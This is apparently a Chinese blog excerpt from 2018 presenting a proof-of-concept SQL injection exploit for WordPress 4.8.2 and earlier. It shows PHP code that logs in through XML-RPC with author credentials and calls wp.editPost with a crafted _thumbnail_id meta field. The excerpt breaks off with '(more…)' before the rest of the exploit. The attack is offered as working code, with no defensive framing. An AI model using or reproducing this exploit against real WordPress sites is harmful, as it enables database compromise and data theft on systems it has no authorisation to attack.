WordPress(4.8.2及以下版本) SQL注入漏洞利用

Write by webmaster in at 2018-06-27 10:34:01

POC
$usr = ‘author’;
$pwd = ‘author’;
$xmlrpc = ‘http://local.target/xmlrpc.php’;
$client = new IXR_Client($xmlrpc);
$content = array(“ID” => 6, ‘meta_input’ => array(“_thumbnail_id”=>”xxx”));
$res = $client->query(‘wp.editPost’,0, $usr, $pwd, 6/post_id/, $content);
添加自定义字段,meta_k…(more…)